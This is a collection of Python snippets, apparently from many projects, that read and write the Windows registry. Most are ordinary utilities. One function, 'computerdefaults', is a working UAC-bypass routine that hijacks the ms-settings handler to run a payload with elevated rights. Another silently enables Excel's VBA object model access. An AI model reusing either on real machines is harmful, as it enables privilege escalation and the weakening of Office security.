def steam_path(self, _path): if _path is None: try: hkey = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\WOW6432Node\Valve\Steam" ) # <PyHKEY:0x0000000000000094> _path = winreg.QueryValueEx(hkey, "InstallPath") winreg.CloseKey(hkey) _path = _path[0] except OSError: messagebox.showerror( "error", "Can't find steam Install directory, select steam install dir" ) _path = filedialog.askdirectory() self._steam_path = _path self.dump('steam_path', _path)
def _r_home_from_registry(): """Return the R home directory from the Windows Registry.""" try: import winreg except ImportError: import _winreg as winreg try: hkey = winreg.OpenKeyEx(winreg.HKEY_LOCAL_MACHINE, "Software\\R-core\\R", 0, winreg.KEY_QUERY_VALUE) r_home = winreg.QueryValueEx(hkey, "InstallPath")[0] winreg.CloseKey(hkey) except Exception as exc: # FileNotFoundError, WindowsError, etc return if sys.version_info[0] == 2: r_home = r_home.encode(sys.getfilesystemencoding()) return r_home
def r_home_from_registry() -> Optional[str]: """Return the R home directory from the Windows Registry.""" try: import winreg # type: ignore except ImportError: import _winreg as winreg # type: ignore try: hkey = winreg.OpenKeyEx(winreg.HKEY_LOCAL_MACHINE, 'Software\\R-core\\R', 0, winreg.KEY_QUERY_VALUE) r_home = winreg.QueryValueEx(hkey, 'InstallPath')[0] winreg.CloseKey(hkey) except Exception: # FileNotFoundError, WindowsError, etc return None if sys.version_info[0] == 2: r_home = r_home.encode(sys.getfilesystemencoding()) return r_home
def unblocker(name): disallow_key = winreg.OpenKey( winreg.HKEY_CURRENT_USER, 'Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun', 0, winreg.KEY_ALL_ACCESS) db = sqlite3.connect('blocked_proc.db') cur = db.cursor() del_id = cur.execute('SELECT id FROM blocked WHERE application = (?)', (name, )).fetchone()[0] del_id = str(del_id) # print('Deleting id {}\n Unblocking application {}'.format(del_id, name)) winreg.DeleteValue(disallow_key, del_id) winreg.CloseKey(disallow_key) cur.execute('DELETE FROM blocked WHERE id = (?)', (del_id)) # print('Done') db.commit() db.close()
def set_serv_parms(service, args): """ Set the service command line parameters in Registry """ import winreg serv = [] for arg in args: serv.append(arg[0]) if arg[1]: serv.append(arg[1]) try: key = winreg.CreateKey(winreg.HKEY_LOCAL_MACHINE, _SERVICE_KEY + service) winreg.SetValueEx(key, _SERVICE_PARM, None, winreg.REG_MULTI_SZ, serv) winreg.CloseKey(key) except OSError: return False return True
def enableVbomExcel(): # Enable writing in macro (VBOM) # First fetch the application version # IT is necessary to exit office or value wont be saved objExcel = win32com.client.Dispatch("Excel.Application") objExcel.Visible = False # do the operation in background version = objExcel.Application.Version objExcel.Application.Quit() del objExcel # Next change/set AccessVBOM registry value to 1 keyval = "Software\\Microsoft\Office\\" + version + "\\Excel\\Security" print("\033[1;77m[-] Set %s to 1...\033[0m" % keyval) Registrykey = winreg.CreateKey(winreg.HKEY_CURRENT_USER, keyval) winreg.SetValueEx(Registrykey, "AccessVBOM", 0, winreg.REG_DWORD, 1) # "REG_DWORD" winreg.CloseKey(Registrykey)
def computerdefaults(payload): print("Payload: {}".format(payload)) print("Attempting to create registry key") try: key = winreg.CreateKey( winreg.HKEY_CURRENT_USER, os.path.join("Software\Classes\ms-settings\shell\open\command")) winreg.SetValueEx(key, None, 0, winreg.REG_SZ, payload) winreg.SetValueEx(key, "DelegateExecute", 0, winreg.REG_SZ, None) winreg.CloseKey(key) except Exception as error: print("Unable to create key") return False else: print("Registry key created") print("Pausing for 5 seconds before executing") time.sleep(5) print("Attempting to create process") try: result = wmi.Win32_Process.Create( CommandLine="cmd.exe /c start computerdefaults.exe", ProcessStartupInformation=wmi.Win32_ProcessStartup.new( ShowWindow=1)) if (result[1] == 0): print("Process started successfully") else: print("Problem creating process") except Exception as error: print("Problem creating process") return False print("Pausing for 5 seconds before cleaning") time.sleep(5) print("Attempting to remove registry key") try: winreg.DeleteKey( winreg.HKEY_CURRENT_USER, os.path.join("Software\Classes\ms-settings\shell\open\command")) except Exception as error: print("Unable to delete key") return False else: print("Registry key was deleted")
def deleteRegKey(errorHandler, key): hKey = None try: mainKey, subKey = splitKeyName(key) preKey , lastKey = splitLastKey(subKey) hKey = winreg.OpenKey(getKeyHandle(mainKey), preKey, 0, winreg.KEY_ALL_ACCESS) winreg.DeleteKey(hKey, lastKey) except Exception: errorInfo={Global.ERROR_CALLSTACK:traceback, Global.ERROR_MESSAGE:traceback.format_exc()} errorHandler.handler(errorInfo); finally: if hKey != None : winreg.CloseKey(hKey) return True
def append_value_in_PATH(v): ''' 把v添加到系统变量PATH中去 :param v: :return: ''' root_key = winreg.HKEY_CURRENT_USER sub_key_name = r'Environment' value_name = r'PATH' key = _open_key(root_key, sub_key_name) val, tpe = _read_key_value(key,value_name) #检测是否包含 tmp = val.split(';') if v not in tmp: _save_key_value(key, value_name, tpe,val+';'+v) winreg.CloseKey(key)
def set_regkey_value(value_entry): logging.info( f"Установка {repr(value_entry).replace('Параметр', 'параметра')}.") try: opened_regkey = winreg.CreateKeyEx( value_entry.root_key, value_entry.subkey, 0, winreg.KEY_WOW64_64KEY + winreg.KEY_WRITE) winreg.SetValueEx(opened_regkey, value_entry.name, 0, value_entry.data_type, value_entry.data) winreg.CloseKey(opened_regkey) logging.info("[УСПЕХ] Параметр установлен.") # HTML_con.html_in(str(value_entry), 2) return str(value_entry) except Exception as registry_exception: logging.info( f"[НЕУДАЧА] Параметр не установлен: {registry_exception}.") raise
def find_vnetlib_registry(regkey): import winreg try: # default path not used, let's look in the registry hkey = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, regkey) install_path, _ = winreg.QueryValueEx(hkey, "InstallPath") winreg.CloseKey(hkey) vnetlib_path = os.path.join(install_path, "vnetlib64.exe") if os.path.exists(vnetlib_path): return vnetlib_path vnetlib_path = os.path.join(install_path, "vnetlib.exe") if os.path.exists(vnetlib_path): return vnetlib_path except OSError: pass return None
def get_winos_fullname(): key = reg.HKEY_LOCAL_MACHINE key_value = "Software\Microsoft\Windows NT\CurrentVersion" open = reg.OpenKey(key,key_value,0,reg.KEY_ALL_ACCESS) try: value, type = reg.QueryValueEx(open,"ProductName") #print(value,"Type:",type) except FileNotFoundError: print("AutoConfigURL not found") reg.CloseKey(open) return value
def read_reg(): """Reads from registry values""" email = None pkey_path = None reg = winreg.ConnectRegistry(None, winreg.HKEY_CURRENT_USER) key = winreg.OpenKey(reg, r'SOFTWARE\Anylink') try: email = winreg.QueryValueEx(key, 'user')[0] pkey_path = winreg.QueryValueEx(key, 'key_path')[0] except EnvironmentError as e: print(e) finally: winreg.CloseKey(key) return email, pkey_path
def _get_install_path(): """ Returns installation path from registry. Available only on Windows """ if is_portable(): return os.environ["XDG_CONFIG_HOME"] try: key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, "Software\\SyncthingGTK") path, keytype = winreg.QueryValueEx(key, "InstallPath") path = str(path) winreg.CloseKey(key) return path except WindowsError: # This is really shouldn't happen. Use executable path. os.path.dirname(sys.executable)
def getenv_system(varname, default=''): import winreg v = default try: rkey = winreg.OpenKey( winreg.HKEY_LOCAL_MACHINE, 'SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment' ) try: v = str(winreg.QueryValueEx(rkey, varname)[0]) v = winreg.ExpandEnvironmentStrings(v) except: pass finally: winreg.CloseKey(rkey) return v
def check_key(key_path=os.path.dirname(os.getenv('APPDATA')) + "\\Local\\{}".format(SERVICE_NAME)): key = winreg.OpenKey( winreg.HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", access=winreg.KEY_READ) try: count = 0 while (True): val, path, data_type = winreg.EnumValue(key, count) if val == SERVICE_NAME: return True count += 1 except: return False finally: winreg.CloseKey(key)
def del_reg(self, mode, reg_path_settings, name=None): if mode == 0: # delete only value try: registry_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, reg_path_settings, 0, winreg.KEY_WRITE) winreg.DeleteValue(registry_key, name) winreg.CloseKey(registry_key) return True except WindowsError: return False else: #delete the whole key (use with caution) try: winreg.DeleteKey(winreg.HKEY_CURRENT_USER, reg_path_settings) return True except: return False
def getOs(): if "win32" in OS_TYPE: try: registry_key = winreg.OpenKey( winreg.HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\Windows NT\CurrentVersion", 0, winreg.KEY_READ) productName, regtype = winreg.QueryValueEx(registry_key, "ProductName") return str(productName) winreg.CloseKey(registry_key) except WindowsError: return platform.system() elif "linux" in OS_TYPE: return distro.name() elif "darwin" in OS_TYPE: return "macOS"
def get_winxp_sdk(): global cached_winxpsdk if cached_winxpsdk is None: try: key = winreg.OpenKey( winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\Microsoft\Microsoft SDKs\Windows\v7.1A") try: (install_dir, _) = winreg.QueryValueEx(key, "InstallationFolder") (version, _) = winreg.QueryValueEx(key, "ProductVersion") cached_winxpsdk = (install_dir.rstrip("\\"), version) finally: winreg.CloseKey(key) except Exception as e: raise MissingDependencyError("Windows XP SDK is not installed") return cached_winxpsdk
def printNets(): net = 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\\NetworkList\Signatures\\Unmanaged' print(net) key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, net) print('\n[*] Networks You have Joined.') for i in range(100): try: guid = winreg.EnumKey(key, i) netKey = winreg.OpenKey(key, str(guid)) (n, addr, t) = winreg.EnumValue(netKey, 5) (n, name, t) = winreg.EnumValue(netKey, 4) macAddr = val2addr(addr) netName = str(name) print('[+] ' + netName + ' ' + macAddr) winreg.CloseKey(netKey) except: break
def addActionToShell(self, name, descr, cmd): """ add action in windows explorer on top of file & dir """ if descr == "": descr = name import winreg as winreg for item in ["*", "Directory"]: key = winreg.CreateKey(winreg.HKEY_CLASSES_ROOT, r'%s\shell\%s' % (item, name)) key2 = winreg.CreateKey(winreg.HKEY_CLASSES_ROOT, r'%s\shell\%s\Command' % (item, name)) winreg.SetValueEx(key, "", None, winreg.REG_SZ, "%s " % descr) winreg.SetValueEx(key, "Icon", None, winreg.REG_SZ, "") winreg.SetValueEx(key, "Position", None, winreg.REG_SZ, "Top") winreg.SetValueEx(key, "", None, winreg.REG_SZ, "%s " % descr) #winreg.SetValueEx(key2,"",None,winreg.REG_SZ,r'cmd.exe /s /k pushd "%V"') winreg.SetValueEx(key2, "", None, winreg.REG_SZ, cmd) winreg.CloseKey(key)
def get_reg_item(type_str): reg = wr.ConnectRegistry(None, wr.HKEY_CURRENT_USER) key = None try: key = wr.CreateKey(reg, r"Software\tf\sts") except WindowsError: print("cannot find keys in register") return if key is None: return ret = "0" try: ret = wr.QueryValueEx(key, type_str)[0] except WindowsError: wr.SetValueEx(key, type_str, 0, wr.REG_SZ, "0") wr.CloseKey(key) return ret
def __set_reg(reg_path, name, value): """ Функция устанавки значения в реестре :param reg_path: Раздел :param name: Имя параметра :param value: Значение """ try: winreg.CreateKey(winreg.HKEY_LOCAL_MACHINE, reg_path) registry_key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, reg_path, 0, winreg.KEY_WRITE) winreg.SetValueEx(registry_key, name, 0, winreg.REG_DWORD, value) winreg.CloseKey(registry_key) return True except WindowsError: return False
def write_windows_registry(target_path, value_value, value_type): # pragma: no cover import winreg main_key, the_rest = target_path.split("\\", 1) subkey_str, value_name = the_rest.rsplit("\\", 1) main_key = getattr(winreg, main_key) try: key = winreg.OpenKey(main_key, subkey_str, 0, winreg.KEY_WRITE) except EnvironmentError as e: if e.errno != errno.ENOENT: raise key = winreg.CreateKey(main_key, subkey_str) try: winreg.SetValueEx(key, value_name, 0, value_type, value_value) finally: winreg.CloseKey(key)
def deleteRegistry(): regKey = r"Software\Microsoft\Windows\CurrentVersion\Run" regValue = "File" hKey = winreg.OpenKey(winreg.HKEY_CURRENT_USER, regKey, 0, winreg.KEY_ALL_ACCESS) i = 0 while True: try: if regValue == winreg.EnumValue(hKey, i)[0]: print("Found Malware registry value") winreg.DeleteValue(hKey, regValue) print("Deleted Malware registry value") break i += 1 except: break winreg.CloseKey(hKey)
def deleteRegistry(regKey, regSubkey, malFile): hKey = winreg.OpenKey(regKey, regSubkey, 0, winreg.KEY_ALL_ACCESS) i = 0 while True: try: x = winreg.EnumValue(hKey, i) value = str(x[0]) data = str(x[1]) if malFile in data: print("Found Malware registry value") winreg.DeleteValue(hKey, value) print("Deleted Malware registry value") break i += 1 except: break winreg.CloseKey(hKey)
def get_registry_key(name): """Gets the value of the registry key in HKEY_CURRENT_USER\REG_PATH Args: name (string): The name of the registry key to get. Returns: string: Returns the value of the registry key. """ try: registry_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, REG_PATH, 0, winreg.KEY_READ) value, regtype = winreg.QueryValueEx(registry_key, name) winreg.CloseKey(registry_key) return value except WindowsError: return None
def is_uri_handler_installed(protocol): key = None try: key = winreg.OpenKey(winreg.HKEY_CLASSES_ROOT, r"{}\shell\open\command".format(protocol)) executable_template = winreg.QueryValue(key, None) splitted_exec = shlex.split(executable_template) if not splitted_exec: return False return os.path.exists(splitted_exec[0]) except OSError: return False except ValueError: return False finally: if key: winreg.CloseKey(key)
def get_processor_name(): # type: () -> str if plf.system() == "Windows": try: import winreg key = winreg.OpenKey( winreg.HKEY_LOCAL_MACHINE, r"Hardware\Description\System\CentralProcessor\0", ) # NOQA processor_brand = winreg.QueryValueEx(key, "ProcessorNameString")[0] winreg.CloseKey(key) return processor_brand except Exception: return plf.processor() elif plf.system() == "Darwin": command = ["sysctl", "-n", "machdep.cpu.brand_string"] return subprocess.check_output(command).strip().decode() elif plf.system() == "Linux": with open("/proc/cpuinfo") as f: for line in f: if "model name" in line: return re.sub(".*model name.*:", "", line, 1) elif "bsd" in plf.system().lower(): def parse_openbsd_cpu(line): m = re.match("^cpu[0-9]+:", line, re.IGNORECASE) if m is None: return m return line.replace(m.group(), "").strip().split(",")[0] assert (parse_openbsd_cpu(OPENBSD_CPU_SAMPLE_LINE) == OPENBSD_CPU_SAMPLE_MODEL) try: with open("/var/run/dmesg.boot") as f: for line in f: r = parse_openbsd_cpu(line) if r: return r except Exception as e: print("Cannot get *BSD CPU %s", e) return "" or plf.machine()
def register_context_menu(uninstall: bool = False): import distutils.sysconfig, winreg pre = distutils.sysconfig.get_config_var("prefix") bindir = os.path.join(pre, "Scripts", "fluss-organizer.exe") REG_PATH = "SOFTWARE\\Classes\\Directory\\shell\\Fluss" if uninstall: winreg.DeleteKey(winreg.HKEY_CURRENT_USER, REG_PATH + "\\command") winreg.DeleteKey(winreg.HKEY_CURRENT_USER, REG_PATH) else: rkey = winreg.CreateKey(winreg.HKEY_CURRENT_USER, REG_PATH) winreg.SetValueEx(rkey, "", 0, winreg.REG_EXPAND_SZ, f'Organize with Fluss') command_key = winreg.CreateKey(rkey, "command") winreg.SetValueEx(command_key, "", 0, winreg.REG_EXPAND_SZ, f'"{bindir}" -d "%V"') winreg.CloseKey(rkey)